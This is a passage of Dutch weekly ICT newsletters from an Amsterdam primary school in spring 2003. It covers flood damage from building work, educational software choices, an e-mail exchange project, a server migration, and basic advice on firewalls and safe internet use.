We zoeken 't verder uit. Dirk probeert de servers nu aan de praat te krijgen met NUT (Network UPS Tools): http://www.exploits.org/nut/
We houden jullie op de hoogte.

Goed weekend,
Karin
Dirk

2003-03-14 w11

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 11 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

RAMPNIEUWS

Afgelopen weekend is de school getroffen door een soort watersnoodrampje. De verbouwing vindt OP het dak plaats. Men heeft de boel niet waterdicht achter gelaten. Tijdens regenbuien op zaterdag is het vreselijk gaan lekken. Eerst op de eerste verdieping, en toen het water daar hoog genoeg stond liep het door naar de kleuterafdeling. Op zondag moesten er waterstofzuigers aan te pas komen om de vloeren droog te krijgen. Op maandag kon er geen les gegeven worden en is het team bezig geweest de boel op te ruimen. (foto?s op de site). Tijdens de lekkage werd de stroom uitgeschakeld. Daardoor was onze website ook niet meer bereikbaar. In de loop van zondag heeft Dirk de webserver direct aan het modem gekoppeld, waardoor de site weer bekeken en bewerkt kon worden. De schade is enorm. Omdat we de computers hadden afgedekt met plastic is daar de schade redelijk beperkt gebleven. De daaropvolgende dinsdag begon het weer te regenen en begon het weer te lekken. "Tja, dat kan gebeuren". We ergeren ons aan de onprofessionele houding van het bouwbedrijf. "De verzekering dekt de schade". We zijn er deze week ontzettend veel tijd aan kwijt geweest. Bah!

EDUCATIEVE HOEK

ICT NASCHOLING ONDERBOUW

Afgelopen dinsdag hadden we een heel verrassende bijeenkomst van de onderbouw. Oorspronkelijk was het de bedoeling dat we op deze bijeenkomst de ervaringen zouden uitwisselen over het gebruik van ?Letterpret?. Helaas is het nog niet gelukt om het programma op onze server aan de praat te krijgen. We hebben alle software onder de loep genomen en bekeken in het licht van onze ICT leerlijn. Vast staat, dat we in elk geval programma?s zullen gebruiken die de muisvaardigheden van jonge kleuters trainen. We willen ook bekijken wat de goede onderdelen van Clowns zijn. Ook kwamen we tot de conclusie, dat ?ik-reken? wat aan de saaie kant is, en dat we op 1 april op het ABC gaan kijken of er uitdagender kleuter-reken-programma?s zijn die aan onze criteria voldoen. Els, die volgende week naar een rekencongres gaat, zal daar uitkijken naar geschikte software. Binnenkort wordt als proef een speciaal toetsenbord voor kleuters aangeschaft. Dit toetsenbord heeft grotere toetsen en er zijn minder toetsen. In groep 2 zal met dit toetsenbord worden gekeken of de oudste kleuters al wat kunnen leren in het kader van de ICT leerlijn: letters typen en de spatiebalk gebruiken. Ook moet gekeken worden naar een programma waarin getypt kan worden (Word, of een ander). De letters moeten standaard groot zijn ingesteld en het liefst schreefloos zijn. Het printen van de woorden die getypt worden is belangrijk. Daarnaar wordt gekeken of dat probleemloos kan verlopen. RSI en kleuters? eter jong geleerd dan oud gedaan? Het is voor kinderen van belang dat al op jonge leeftijd de bewustwording over RSI en de kennis over gezond omgaan met computers wordt vergroot. In de onderbouw kan daarvoor een basis worden gelegd door aandacht te besteden aan een aantal facetten: zoals de duur van een computersessie, houding etc. Voor groep 2 bestaat materiaal op dit gebied over muisje Max. Zie http://www.rsi-centrum.nl/html/NL/muismax.shtml De werkplekken zouden in dit kader onder de loep genomen moeten worden. Hoe kan voor iedere kleuter een werkplek enigszins op maat worden gegarandeerd? Ook in de andere groepen moet weer eens worden gekeken naar de zithouding, tafelhoogte, beeldschermhoogtes etc.

BERENPROJECT

Deze week gingen we van start met het Berenproject. In de groepen 3, 4 en 5 gaat er elke dag een beer van De Louis Bouwmeesterschool uit logeren bij een leerling van de Rosa Boekdrukker. De volgende dag vertelt de beer per e-mail aan de eigen klas wat hij heeft meegemaakt bij het logeren. Er waren wat probleempjes: emailadressen die niet werkten, beren vergeten. Volgende week gaat het vast beter. Het is echt geweldig te lezen wat die beren meemaken: van mee naar voetballen tot mee naar de tandarts.

DIVERSEN

DIGITALE CAMERA

We hebben deze week een digitale fotocamera te leen. Geweldig. In een wip staat een foto op de website. Natuurlijk ook zo snel, door de handige manier waarmee we de website kunnen vullen.

S@S, ONS CMS

Fred werkt de laatste tijd keihard aan ons content management systeem. Er kunnen nu ook 'vraag en aanbod' advertenties op geplaatst worden. De verbeteringen komen soms per uur binnen en de bugs worden verwijderd met een snelheid die doet vermoeden dat Fred een grote vliegenmepper heeft. We ontdekken dat het CMS steeds meer gebruikers heeft. Nu weer een school in Friesland die ermee aan de slag is. De Corantijn en de Mgr. Bekkersschool gaan er ook mee werken. Dirk wist het CMS bijna om zeep te helpen. Tovenaarsleerling?. Gelukkig wist de tovenaar met een heldere gedachte de boel te redden. Dirk was bezig een Bulletin Board te installeren. Nu werkt het: http://rosaboekdrukker.net/phpBB2/index.php Hier kunnen alle wensen en ideeë® voor S@S verzameld worden.

Goed weekend,
Karin
Dirk

2003-03-21 w12

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Nieuwsbrief via de Rosaboekdrukker Jaargang 2 - week 12 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

INFORMATIE OVER OORLOG IN IRAK VOOR LEERKRACHTEN en KINDEREN

Bron: POLS http://www.internetwijzer-bao.nl/default.asp?strhoofditem=0&sublink=287 Internetwijzer Basisonderwijs selecteerde een aantal websites met de nodige achtergrondinformatie. Ook websites voor kinderen, bijvoorbeeld een rechtstreekse link naar de pagina waar het Jeugdjournaal verslag doet van de oorlog en een website met foto?s van de gewone mensen in Irak. Verder is er een lesbrief van Kennisnet die direct te downloaden is en zijn er adviezen van KPCgroep en APS over hoe leerkrachten met oorlog en spanning op school kunnen omgaan. Om het laatste nieuws te kunnen volgen, is een link naar teletekst geplaatst. Indien nodig wordt het aantal verwijzingen nog uitgebreid.

BERENPROJECT

De kinderen é® de leerkrachten! zijn heel enthousiast bezig met het berenproject. Er wordt druk gemaild en ook worden er foto?s meegestuurd die we zo snel mogelijk op onze webstek plaatsen. Zelfs Nienke, onze gymjuf, deed mee en liet een beer aan de ringen zwaaien. Monique van het ABC kwam een kijkje nemen om te zien hoe het gaat. Monique: "Heel leuk zoals het hier gaat. De kinderen zitten zo rustig te tikken en er wordt zo goed hulp aan elkaar geboden". Op maandag 14 april gaan we samen met de leerkrachten van de Louis Bouwmeesterschool het project evalueren.

BIJEENKOMST VOOR ICT COÖRDINATOREN OP HET ABC

Deze bijeenkomst was gewijd aan Linux en Open Source Software. We gingen allemaal naar huis met een Knoppix cd-rom om thuis ook eens rustig de indruk te krijgen wat voor soort programma?s er allemaal al onder Linux op de desktop verkrijgbaar zijn. Het werkt allemaal heel vertrouwd.

ICT-LEERLIJN

Om te kijken wat er in de kleuterbouw al als voorbereiding op het werken met de tekstverwerker gedaan kan worden is in onze oudste kleutergroep een begin gemaakt om kinderen een verhaaltje te laten schrijven in Word. De leerkracht heeft verteld, dat er tussen de woorden één spatie hoort. Er is een heel klein beetje geholpen met de spelling, als het kind erom vroeg. Deze fonetische verhalen zijn heel goed te begrijpen. Niet alle kleuters op onze school kunnen dit. http://rosaboekdrukker.net/index.php?section=4&page=328

WERKSTUKKEN

Er wordt flink gewerkt door de groepen 6 t/m 8 aan de werkstukken (opdracht tussen krokusvakantie en meivakantie). De leerkrachten die dat willen kunnen een beroep doen op steun van de ICT co?nator. Er wordt gelet op het juist gebruik van de functies in het tekstverwerkingsprogramma. Als het getypte klaar is, wordt de tekst verder opgemaakt. De eindproducten zullen zoveel mogelijk op onze website gezet worden. Meer nieuws volgt.

DRO

Volgende week is er weer een DRO-scholing. Op maandag 24 maart. De laatste van dit schooljaar is op 12 mei.

EVENWAARDIG NEDERLANDS

Eindelijk een oplossing voor de taalproblemen die we m.b.t. ICT hebben. Wij proberen, als het kan, voor alle engelse woorden op ICT gebied steeds Nederlandse oplossingen te vinden. Zo noemden we de schoolchat ?rosa?s kletshoek?. Maar het lukt vaak niet een goed Nederlands alternatief te vinden. Maar nu is er uitkomst!!! Uit de Taalpost van deze week overgenomen! http://www.vanzijderveld-tekst.nl/ Een woordenlijst die ruim vierduizend vreemde woorden bevat met voorstellen voor Nederlandse vervangers.

HARDWARE

Bij Hedy in groep 3 hebben we de dual boot computer (Windows 3.11 met leesprogramma en Windows 98 voor de andere zaken) geinstalleerd. De ondergelopen computer bij Gerda, waarop ons bibliotheekprogramma Educat-B is gedroogd en weer in bedrijf.

DE LINUX HOEK

Dirk worstelt deze week met het UPS (de noodstroomvoorziening). Het bedrijf dat het UPS leverde belooft ook een oplossing, maar D. wil 't ook zonder hun foef werkend krijgen. Dat valt niet mee. Hij wordt er af en toe stapelgek van.

GECERTIFICEERD!

We zijn een gecertificeerd leerbedrijf geworden. Dit houdt in dat we leerlingen van ICT Academies die de 3 jarige opleiding "Medewerker Beheer ICT" volgen als stagiaire genoeg te bieden hebben. Nu nog de stagiaire met Linux ervaring binnenhalen?.

Goed weekend,
Karin,
Dirk.

2003-03-28 w13

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 13 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

BEZOEK WESTERWEEL

Wegens nieuwbouw is de Joop Westerweel gehuisvest op drie locaties. Op één van de locaties is een computernetwerk aangelegd. Eé® van de medewerkers kwam van de week bij ons haar licht opsteken over websites. We hopen, dat we hebben kunnen helpen. Volgende week nemen we een kijkje daar.

ICT LEERLIJN

Samen met het ABC werken we al een aantal jaren aan een ICT leerlijn. Die begint nu echt een goede vorm aan te nemen. Daarmee bedoelen we: met vallen en opstaan hebben we geprobeerd wat we ook echt waar kunnen maken in de klas. Welke onderdelen zullen elk jaar in de groepen worden gedaan? Deze week hebben we alles nog eens doorgenomen: aan welke knelpunten moet nog aandacht besteed worden?

DRO

Hebben we even verschoven.

REKENSOFTWARE KLEUTERBOUW

a.s. dinsdag gaan we naar het ABC om een leuk programma uit te zoeken. Op de wiskunde dagen in Noordwijk (vorige week donderdag en vrijdag) is geen suggestie gegeven. Het ging daar voornamelijk om de interactie tussen leerkracht en leerlingen bij het rekenonderwijs.

BERENPROJECT

Gaat nog steeds goed. Kinderen nemen de beer graag mee en vertellen er enthousiast over. En uiteraard wordt er zeer druk ge-e-maild. Ook de Louis Bouwmeesterschool is heel enthousiast.

FOTO'S OP DE WEBSITE

Met een geleende camera worden regelmatig foto?s gemaakt. Het lukt alleen niet om ze allemaal snel op de website te zetten. Ook kunnen er maar 10 foto?s genomen worden, dan moet het toestel in een computer ?geleegd? worden. We zoeken nog steeds naar een 'goede' camera. Deze week foto?s van het berenproject en van groep 6 en 8 die aan de werkstukken bezig zijn. Ook proberen we elke week foto?s van de verbouwing te nemen. Vandaag (vrijdag 28 maart) is de vloer gestort; die foto's staan al wel op de website: http://rosaboekdrukker.net/index.php?section=2&page=321

http://mediatheek.thinkquest.nl/~kl044/tmain.htm Deze website is ontwikkeld voor neveninstromers, leerlingen ouder dan zes jaar. Op deze site wordt interactieve Nederlandse les geboden. Neem eens een kijkje. Is het wat? Graag melden. De tekeningen lijken op die uit Knoop en Laat.

DATUM SCHOOLLAN AANLEG

Op maandag 28, dinsdag 29 april en donderdag 1 mei wordt SchoolLAN bij ons ge﮳talleerd. Dit houdt in dat we van 'DirkLan" (de servers die Dirk in de loop der jaren neerzette) overstappen op een server die speciaal voor het basisonderwijs is ontwikkeld. Beheer zal zeer eenvoudig zijn.

CMS

We zijn hard bezig met de versie 1.1 van het Content Management Systeem en hopen het dit weekend uit te brengen. Dirk en Karin testen en Fred Stuurman haalt de bugs eruit.

Goed weekend,
Karin
Dirk

2003-04-04 w14

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 14 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

STATISTIEKEN WEBSITE

Sinds een aantal weken hebben wij de mogelijkheid te zien hoeveel keer onze site wordt bekeken. Ook zien we welke pagina's binnen de site favoriet zijn. Natuurlijk scoort de eerste pagina het hoogst. Daarna komen de foto's van de waterschade en de verbouwing, het berenproject, de leerlingpagina's, de lessuggesties, ons CMS en het gastenboek. In drie dagen is de startpagina 150 keer bezocht.

REKENSOFTWARE KLEUTERBOUW

Op dinsdag waren we met een delegatie naar het ABC om verschillende softwareprogramma's te vergelijken. Aan de hand van de door ons opgestelde criteria werd beoordeeld. Schatkist met de Muis rekenen: daarin wordt veel te veel gepraat (niet voor onze doelgroep) en het stemmetje vinden we erg irritant, registratiegedeelte heel uitgebreid, maar ingewikkeld. Pluspunt: te oubollig, niet uitdagend genoeg, saai, registratie onvoldoende. Alles Telt: de leerkrachten zijn hier enthousiast over: heel uitdagend, veel mogelijkheden, en een duidelijke registratie. De volgende stap is uitvinden of het programma zal werken op de schoolLan server.

PROGRAMMEERWEDSTRIJD

Dirk zat woensdag in Weert in de jury van de Linux Magazine wedstrijd om educatieve computerprogramma's voor het basisonderwijs te maken. De uitslag is nog niet openbaar, maar hij verklapt nu alvast dat de oogst heel goed is.

BEZOEK AAN DE JOOP WESTERWEEL

Maandag bezocht Dirk de Joop Westerweelschool. Ze zitten in een tijdelijke situatie in afwachting van hun nieuwe school. Toch hebben ze een netwerk aangelegd. Gewoon kabels vastspijkeren aan de muren en gaan met die banaan! Het werkt prima!

ROCVA

We kregen bezoek van Mark Broekmans, projectleider van het ROC van Amsterdam. Zij zijn met een helpdesk voor SchoolLan bezig en komen binnenkort een keertje met wat docenten bij ons kijken. Het ROCVA zou een goed instituut voor ondersteuning, helpdesk en stagiaires kunnen zijn.

groeten,
Karin
Dirk.

2003-04-11 w15

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 15 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

BESTELLINGEN

Alles telt voor de kleuterbouw is besteld en zal na de mei-vakantie in gebruik worden genomen. Net als Letterpret, dat door de Stichting SchoolLan aan de praat wordt gebracht. Ook het toetsenbord voor de oudste kleutergroep is besteld, met schrijfletters. Duur!!!! Inclusief BTW en verzendkosten ?92.- !!!

BERENPROJECT

Het email project van de logeerberen loopt ten einde. Op de Louis Bouwmeester is nu bijna iedereen aan de beurt geweest. Op de Rosa Boekdrukker mocht een aantal kinderen de beer voor de tweede keer mee. Volgende week wordt het project met alle betrokken leerkrachten ge붡lueerd. (maandag 14 april om 15.45 uur op de Rosa Boekdrukker)

TYPELES

We zijn als experiment heel voorzichtig begonnen met typeles in groep 6. We hebben een eenvoudig typeprogramma op de server gezet en de kinderen kunnen een floppy met het programma mee naar huis krijgen. Ze mogen maximaal 10 minuten per dag oefenen (RSI).

PAASIDEEËN

http://rosaboekdrukker.net/index.php?section=10&page=344 Op de pagina lessuggesties in de nieuwsbrief van Kennisnet, april 2003.

TIMMERMAN.

Tijdens de verbouwing komen er wat aanpassingen ten gunste van ICT: er komt een groot werkblad voor de computers in de hal op de 1e verdieping. Op de 2e verdieping komt net zo?n computer werkplek. We zoeken nu nog geschikte stoelen/krukken voor verschillende lengtes kinderen. Ook komt er een werkblad voor de ICT werkers en voor de printer, vlakbij het serverhok. Als het lukt om alle leerboeken in aparte kasten op te bergen, dan zal het serverhok na de verbouwing helemaal voor ICT mogen zijn.

WEBSITE

Nieuwe versie van CMS in gebruik genomen. Daardoor moet er wel van alles worden opgeruimd in het bestandsbeheer. Het kan gebeuren dat sommige plaatjes op de website tijdelijk uit de lucht zijn. Het grote voordeel is dat de leerlingpagina's nu gemakkelijker te beheren zijn. Er zijn nu drie andere scholen die het CMS gebruiken: www.waalsdorp.nl www.2edalton.nl www.deopslach.nl

STROOMSTORING:

Afgelopen Zaterdagavond om 23.08 was er gedurende 9 seconden een stroomstoring. Onze noodstroomvoorziening mailde dit aan Karin en Dirk en ving de storing netjes op.

BEZOEK AAN ASCII

Dirk bracht aan bezoek aan de Linux groep ASCII die in de Kinkerstraat 92 in Amsterdam een nieuw onderkomen betrok. Hij trof daar enthousiast werkende kindertjes aan achter Linux computers. Daartoe hebben ze bij ASCII aan 1 computer 3 gebruikers hangen (3 beeldschermen, 3 muizen, 3 toetsenborden). Zeer efficië®´!! En het werkt als een zonnetje! We hadden het met Jaap Vermaas over de mogelijkheden van ASCII om SchoolLAN support te verlenen voor de SchoolLAN plekken in de Baarsjes (binnenkort Rosa en Corantijn).

EDUROMS

We krijgen de 'Leesoefeningen' wel aan de praat, maar het printen van de resultaten van een leerling lukt niet. We krijgen een blanke pagina. 'Uitbreiding van de woordenschat' doet het helemaal niet. Oh, wat zullen we blij zijn als al deze zaken onder SchoolLAN goed werken. Dirk verheugt zich al op zijn bijscholing.

Tot zover, goed weekend
Karin
Dirk

2003-04-18 w16

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 16 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

BERENPROJECT

Afgelopen maandag vond er op de Rosa B een evaluatiebijeenkomst plaats met leerkrachten van de Louis Bouwmeester en de Rosa B. We hebben het email-berenproject ge붡lueerd en we hebben bekeken hoe we het project volgend jaar kunnen inzetten. o.a. kwam aan de orde wanneer en hoe de (jonge) leerlingen een tekst kunnen schrijven en per email versturen. We kwamen tot de conclusie, dat de beer het beste meekan in de periode tussen de krokus en de meivakantie in groep 4. Een uitgebreider verslag zal op de site van onze school gezet worden. Iedereen was heel enthousiast over het project.

ICT LEERLIJN

Deze week hebben de ICT co?nator en de begeleidster van het ABC alle onderdelen van onze ICT leerlijn nog eens onder de loep genomen. Nu is duidelijk zichtbaar waar volgend jaar nog aan gewerkt moet worden. Daaruit valt weer op te maken welke - en hoeveel scholing er volgend jaar ingehuurd moet worden. We kunnen alvast verklappen, dat het accent zal komen te liggen op consulten in de klassen. Dus directe en praktische hulp en aanwijzingen bij het uitvoeren van de leerlijn. Dit schooljaar, na de meivakantie, zal ook ondersteuning geboden worden bij het in gebruik nemen (leerlingen op het juiste niveau invoeren) van de programma's Letterpret en Alles Telt bij de kleuters.

ZORGPROFIEL

Alle scholen in het samenwerkingsverband WSNS moeten een zorgprofiel voor hun school opstellen. De eerste aanzet daarvoor is het computer-programma 'zorgprofiel'. In het programma kunnen alle leerkrachten aan de hand van een aantal casussen vaststellen in welke mate de school bepaalde zorgkwaliteiten in huis heeft. Het programma hebben wij gedownload van de website van het samenwerkingsverband. Om te voorkomen dat iedereen op dezelfde computer moet werken, hebben we het programma op de server gezet. In principe kan het programma nu op alle computers ingevuld worden. Na de meivakantie kan met invullen begonnen worden.

SCHOOLLAN INSTALLATIE

Ter voorbereiding van de SchoolLan-installatie in de meivakantie, hebben we een lijst gemaakt van de software die op de nieuwe server zal moeten draaien. Verder moet van allerlei programma's die nu draaien de licentie van de oude server verwijderd worden. Het kan dus zijn dat we in de week voor de migratie bepaalde programma's moeten missen. We doen ons best e.e.a. te voorkomen door sluitende afspraken met de uitgevers te maken voor nieuwe licentiecodes op het juiste moment.. We zijn benieuwd en we zullen t.z.t. melden wat het allemaal doet en hoe!!!

GRATIS FIREWALL

(freeware) Steeds meer collega's hebben een kabel- of adsl-aansluiting. Als zij hun computer lang aan hebben staan, is het wenselijk aandacht te besteden aan een extra beveiliging. Onlangs is de computer van een collega die geen aandacht aan beveiliging besteedde heftig geﮦecteerd door virus/sen. Gevolg: hij kon geen verbinding meer krijgen met het Internet. Kosten van herinstallatie bij de PC-Dokter: EUR 42,50. Lees hieronder meer over beveiliging van je computer met een firewall:
(overgenomen van Zone Alarm): ZoneAlarm 3.1.395 Krijg een uitstekende FireWall  voor niets. Waarom proberen hackers de computer binnen te dringen van internetters die lang on-line zijn? Het antwoord is simpel: omdat het mogelijk is! Of u nu een kabelmodem gebruikt, ADSL, of een gewoon modem, er is iets dat u waarschijnlijk niet snel zult toegeven maar u bent een makkelijke prooi voor een kwaadwillige hacker. Deze kan uw systeem binnendringen, uw bestanden bekijken en zelfs uw hele pc overnemen. Ook kan hij data wissen. ZoneAlarm 3.1.395 is de nieuwste versie van de alom geprezen gratis firewall van Zonelabs. Het is zodanig ontworpen dat u simpel en effectief dit gevaar van een aanval kunt voorkomen. Deze versie van ZoneAlarm heeft een stap voor stap setup procedure die gemakkelijk en zonder enig onduidelijkheid is te volgen. De nieuwe "startup tutorial" verklaart duidelijk de controle mogelijkheden en waarschuwingen, en zorgt dat u snel beschermd bent. ZoneAlarm heeft een nieuw, op kleurencode gebaseerd, alarm en geeft u een advies hoe te handelen. Ook nieuw is het "waakzaamheids advies" dat u een duidelijk advies geeft afkomstig van de experts van Zone Labs waardoor u bij hack waarschuwingen met vertrouwen kunt reageren. (einde overgenomen van ZoneAlarm)
Download ZoneAlarm hier: http://download.com.com/3000-2092-10039884.html?part=zonealarm&subj=dlpage&tag=button

HACKPOGINGEN

In aansluiting op het voorgaande bericht: Afgelopen weekend zijn talloze pogingen gedaan om de server van de school op een onwenselijke manier te benaderen. Dat zien we aan de logfiles (alles wat op de servers gebeurt wordt geadministreerd). We waren zelfs bang dat we gehacked waren. Nader onderzoek (extra virusscan, en chkrootkit: http://www.chkrootkit.org ), een vraag in de nieuwsgroep en het antwoord dat we daarop kregen van een expert, leverde op dat we weer gerust zijn. Chkrootkit gaf een 'false positive'. Onze server is niet gehacked!. Goeie firewall dus?

Prettige Pasen,
Karin,
Dirk.

2003-04-25 w17

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 17 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

DRO (Digitaal Rijbewijs Onderwijs)

Het afgelopen jaar is aan teamleden van onze school de mogelijkheid geboden om te werken aan de verbetering van de eigen computervaardigheden met behulp van begeleiding van onze onderwijs begeleidingsdienst. Dat noemden we in de wandelgangen DRO, maar dat was het natuurlijk eigenlijk niet, omdat er verder geen toetsen/examens o.i.d. aan verbonden waren. Het kwam erop neer dat we boeken van de methode Instruct kregen en met zelfstudie aan de gang gingen. Op 5 bijeenkomsten was het dan mogelijk om met vragen te komen. Op de bijeenkomsten was iedereen enthousiast, maar aan de zelfstudie kwamen we maar weinig toe. Voor volgend jaar zal er toch nog een kans zijn om met vragen te komen, maar dan op binnenschools niveau. Op het ICT ?spreekuur? op maandag na schooltijd kunnen ook vragen beantwoord worden die voor de persoonlijke ICT bevordering gelden.

BEGELEIDING 2003 - 2004

De evaluatie van onze ICT-leerlijn heeft geresulteerd in een pracht van een begeleidingsvoorstel voor het komende schooljaar. Het staat nu allemaal vast op papier. Mooi op tijd geregeld, vinden we zelf. Het zal betaald worden van de ICT-gelden.

AMI MOUSE 250S MINI OPTICAL

http://www.trust.nl/home/default.htm?viewpage=products/productgrp.htm%3Fgrp%3DMICE Is dit de muis die handig is voor kleuterhanden? Eigenlijk is deze muis bedoeld bij een laptop. We gaan deze muis uittesten en/of horen graag commentaar.

KEYBOARD

Het dure nieuwe keyboard voor de oudste kleutergroep laat nog even op zich wachten. Er zijn veel bestellingen en die dingen worden met de hand gesoldeerd, volgens onze leverancier.

PRENTENBOEKEN DIGITAAL

Volgens recent onderzoek ( http://www.taalsite.nl/artikel/1/668/ ) zijn er drie prentenboeken op cd-rom zeer de moeite waard: - P.B. beer is jarig - Ik maak je weer beter, zei beer - Groot feest voor tijger

SCHOOLLAN MIGRATIE

Heel spannend, de week voordat we overgaan op een nieuw systeem. De software wordt verzameld, de computers weer eens ge﮶entariseerd. De afspraken voor de vakantie: catering voor de ict-technici. Een geluk: de school is toch gedeeltelijk open, omdat de verbouwing nog steeds bezig is. De migratie vindt plaats op 28 en 29 april en 1 mei. Onverwachte problemen kunnen dan hopelijk nog worden opgelost voordat de lessen weer beginnen op 6 mei. En: zal de Leesladder na de MIGRATIE het eindelijk een beetje normaal doen? Zullen de programma's eindelijk veilig draaien? Hebben we overal aan gedacht?? Dirk ziet uit naar drie dagen bijscholing. Soms zal de webserver onbereikbaar zijn. Alles van de twee servers die we nu gebruiken wordt overgezet op de ene nieuwe. Pas deze week hebben we besloten hoe we de SchoolLAN server aan het Internet gaan aansluiten. Dit besluit kwam tot stand na overleg met een aantal experts op Internet- en SchoolLAN gebied. Peter, Ruud en Jaap, zeer bedankt voor jullie adviezen. Meer hierover op: http://rosaboekdrukker.net/index.php?section=6&page=379.

groeten,
Karin
Dirk

2003-05-09 w19

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 19 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONS NETWERK

In de vakantie is er hard gewerkt aan de installatie van SchoolLAN. Jammer genoeg is het installatieproces maar gedeeltelijk gelukt. Installatieproblemen en niet volledig functionele componenten hebben geleid tot opschorting van de verdere installatie tot een aantal zaken naar tevredenheid geregeld zijn. Daarvoor moeten we met de makers van SchoolLAN rond de tafel om tot een functioneler, meer gestandaardiseerd en beter gedocumenteerd SchoolLAN te komen.

LETTERPRET

Eindelijk: het lang verwachte programma Letterpret doet het op de schoolLan server. Aan het werk groepen 1 en 2!

NIEUWSBRIEVEN

De laatste aardrijkskunde nieuwsbrief staat op onze site bij leerkrachten en lessuggesties!

VEILIG INTERNETTEN

Wij zien het als taak van de school de leerlingen leren om te gaan met de gevaren op het internet. Het instellen van allerlei filters is volgens ons niet opvoedend. Als je de kinderen de mogelijkheid biedt het internet op te gaan, moeten ze ook de spelregels kennen. Niet alle ouders die wel een internet aansluiting hebben zullen ook alles weten wat erbij komt kijken. Bijvoorbeeld: de kinderen chatten thuis en gebruiken daar een nep-naam voor. Even een greep uit een aantal namen die kinderen van de Rosa Boekdrukker op MSN (de microsoft chat) gebruiken: ?I like everybody!!!!?, ?don?t miss!!!!?, ?counter-strike?, ?the killerboy?, ?the hot chick?. Het is dus erg nodig te helpen bij de internetopvoeding. - Spreek regels af bij het internetten. - Bouw vertrouwen op met uw leerlingen. - Blijf in de buurt bij uw leerlingen en pc's. - Zorg ervoor dat de persoonlijke gegevens privé ¢lijven - Betrek collega's en ouders bij uw internet beleid. - Chat liever niet in een openbare chatbox. - Laat leerlingen elkaar (en de school) adviseren. - Praat ook over de leuke dingen van het internet - Ga zelf ook eens chatten. - Ga zelf op cursus: cybercoaching. Meer informatie? 10 tips voor leerkrachten: ( http://www.msn.nl/veiligonline/leraren/#a ):
Een aantal sites waar volwassenen wat kunnen leren: www.kinderconsument.nl www.surfopsafe.nl www.veiligophetweb.nl www.cybercoaching.nl

n.b. door onze regels zullen de kinderen niet veel gelegenheid hebben om 'verkeerde' dingen te doen. Onze regels zijn na te lezen op onze website:
http://rosaboekdrukker.net/index.php?page=147&section=6

ICT ACADEMIE

Op de ICT Academie staat een proefopstelling van SchoolLAN. We hebben kennis gemaakt met de studenten en hun begeleider. Ze zijn zeer enthousiast en zijn ook al bij ons op bezoek geweest. Beide bezoeken verliepen plezierig en waren leerzaam. De studenten hebben voor hun vragen een Forum opgericht en hebben een gezamenlijk email adres. Ook zijn er vanuit de ICT Academie vragen van applicatie-ontwikkelaars. Dat zijn studenten die voor hun afstuderen een levensecht project moeten doen: Het schrijven van een computerprogramma dat gebruikt wordt. De vraag aan de Rosa Boekdrukker was: "Wat kunnen we voor jullie programmeren". De redactie van deze nieuwsbrief wacht met spanning op jullie reacties.

Goed weekend,
Karin,
Dirk.

2003-05-16 w20

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 20 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

DRO "scholing"

Afgelopen maandag was de laatste bijeenkomst waarin de leerkrachten de gelegenheid kregen iets aan de eigen vaardigheden op ICT gebied te doen. We werden in groepjes verdeeld en kregen de opdracht een werkblad na te maken. Welke groep lukte het het snelst? Het was een opdracht compleet met invoegen van plaatje, kolommen maken en een tabel met onzichtbare lijnen. Ja ja, hier op de Rosa Boekdrukker zitten knappe leerkrachten!

CURSUS "Nieuwe ontwikkelingen voor ICT co?natoren".

Deze bijeenkomst was gewijd aan systeembeheer. Algemeen wordt gevonden: het technische gedeelte hoort niet bij de leerkracht, maar de rest wel. Dus wel: nadenken over hoe het netwerk gebruikt wordt, wat erop staat en ook de financi묥 planning. Maar niet: kabels aanleggen, computers openschroeven, ingewikkelde software op de server zetten. Het is verbazend, dat die cursus niet stampvol zit. Waar zijn al die andere ICT co?natoren in Amsterdam? Loopt het op de andere scholen dan allemaal al op rolletjes? En hebben ze daar allemaal al hun ICT leerlijn goed draaiend? (we zaten met zijn drieën!).

ALLES TELT

We hebben 'Alles telt' op de server draaien. Dit is en reken- en wiskundemethode voor het basisonderwijs. Wij hebben 't voor de kleutergroepen. Het programma installeerde moeiteloos; we hebben ThiemeMeulenhof ermee gecomplimenteerd.

MALMBERG EN ZWIJSEN

Minder leuk is dat Karin van vele kanten verhalen hoort over de slecht draaiende netwerkprogramma's en beveiligingsproblemen van Malmberg en Zwijsen.
Aanstaande dinsdag worden de kleutergroepen "geschoold" in het gebruik van Letterpret, tijdens een marge-middag.

EINDELIJK GEVONDEN!

Sommige kinderen raken hun werkstukken kwijt. We konden er tot nu toe niet achter komen hoe ze dat nou deden. Gelukkig kunnen we, dankzij ons voortreffelijk backup systeem, de werkstukken wel terugvinden.
Eindelijk weten we nu hoe ze het doen.
Sommige kinderen zien/weten niet goed het verschil tussen 'Openen' en 'Opslaan' in Word. Dit gebeurt er:
Kind opent "Word", krijgt leeg document, is in de war met begrippen opslaan als en openen en kiest voor "opslaan als" en klikt op zijn/haar werkstuk. Dan komt de vraag: wilt u het bestaande document vervangen en het kind kiest "ja". Vervolgens wordt het lege document opgeslagen onder de naam van het werkstuk en het werkstuk is weg.
Nu hebben we eindelijk de echte reden en achtergrond waarom we B U http://hightek.org als backup systeem hebben.

SCHOOLLAN

